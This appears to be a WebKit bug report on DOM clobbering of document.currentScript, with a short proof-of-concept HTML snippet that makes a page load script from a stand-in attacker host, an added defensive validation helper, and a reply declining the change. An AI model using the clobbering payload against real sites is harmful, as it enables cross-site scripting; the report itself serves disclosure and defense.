There is a relatively common source of CVEs that is being reported, e.g.

- https://vulert.com/vuln-db/CVE-2024-45389
- https://github.com/advisories/GHSA-gcx4-mw62-g8wm
- https://nvd.nist.gov/vuln/detail/CVE-2024-45812
- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

based on a "DOM clobbering" technique, where if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide what URL to load a sibling JS file from, then an attacker can elevate their attack from DOM clobbering to an XSS attack. I.e.

```html
<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
// document.currentScript is clobbered by the <img name='currentScript'> above,
// so .src is the attacker-controlled image URL rather than this script's URL.
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
document.body.appendChild(script); // the element must be attached for the load to happen
</script></body></html>
```

will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at.

This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687 where it is asked that browsers would blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536 .

Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ?

(This is a security problem, but not marking it hidden since there are already so many public CVEs that have been reported and the issue has been known since at least 2016.)
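Until browsers change the clobbering behaviour, a page can defend itself by validating `document.currentScript` before trusting its `src`. The following is an added example written for this report, not code from the bug reporter, WebKit or any of the linked advisories. It checks that the value really is a `<script>` element (a clobbered value is an `<img>`, `<form>` or similar) and that its URL resolves to the page's own origin before deriving a sibling-script URL. The helper name `resolveSiblingScriptUrl` is hypothetical, and the DOM objects below are constructed stand-ins so the code runs in Node; in a real page the element check would be `document.currentScript instanceof HTMLScriptElement` and the origin would come from `location.origin`.

```javascript
// Hardened replacement for `document.currentScript.src`-based sibling loading.
// Returns the absolute URL of `siblingName` next to the running script, or null
// when the value cannot be trusted. Example code, not part of the bug report.
function resolveSiblingScriptUrl(doc, pageOrigin, siblingName) {
  const cur = doc.currentScript;

  // DOM clobbering: <img name="currentScript"> makes this an image element.
  // In a browser use `cur instanceof HTMLScriptElement`; the tagName check
  // keeps the example runnable outside a browser.
  if (!cur || typeof cur !== 'object' ||
      String(cur.tagName).toUpperCase() !== 'SCRIPT') {
    return null;
  }

  // Inline scripts have no src, so there is no directory to derive.
  if (typeof cur.src !== 'string' || cur.src === '') {
    return null;
  }

  let url;
  try {
    url = new URL(cur.src, pageOrigin);
  } catch (e) {
    return null; // unparsable src: refuse rather than guess
  }

  // Only trust the directory when the script itself came from our origin;
  // this also blocks the attacker-hosted URL case even if the element check
  // were ever bypassed.
  if (url.origin !== pageOrigin) {
    return null;
  }

  const dir = url.pathname.slice(0, url.pathname.lastIndexOf('/') + 1);
  return new URL(dir + siblingName, url.origin).href;
}

// Constructed stand-ins for DOM objects (not real browser elements).
const PAGE_ORIGIN = 'https://example.test';

// Clobbered: the "currentScript" is really an <img> pointing at an attacker host.
const clobberedDoc = {
  currentScript: { tagName: 'IMG', src: 'http://bad.attacker.site.com/foo.js' },
};
// Legitimate same-origin external script.
const legitDoc = {
  currentScript: { tagName: 'SCRIPT', src: 'https://example.test/static/app.js' },
};
// Real <script>, but served from another origin: not trusted for sibling loads.
const crossOriginDoc = {
  currentScript: { tagName: 'SCRIPT', src: 'https://cdn.example.test/app.js' },
};
// Inline script: nothing to derive from.
const inlineDoc = { currentScript: { tagName: 'SCRIPT', src: '' } };

console.log(resolveSiblingScriptUrl(clobberedDoc, PAGE_ORIGIN, 'sibling.js'));   // null
console.log(resolveSiblingScriptUrl(legitDoc, PAGE_ORIGIN, 'sibling.js'));       // https://example.test/static/sibling.js
console.log(resolveSiblingScriptUrl(crossOriginDoc, PAGE_ORIGIN, 'sibling.js')); // null
console.log(resolveSiblingScriptUrl(inlineDoc, PAGE_ORIGIN, 'sibling.js'));      // null
```

The element check alone stops the clobbering case in the report; the origin check is the belt to that braces, since a sibling loader that only ever needs same-origin scripts has no reason to accept any other base URL.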
<rdar://problem/138025273>
This has been interoperable browser behavior for years, and I don't think we can change that.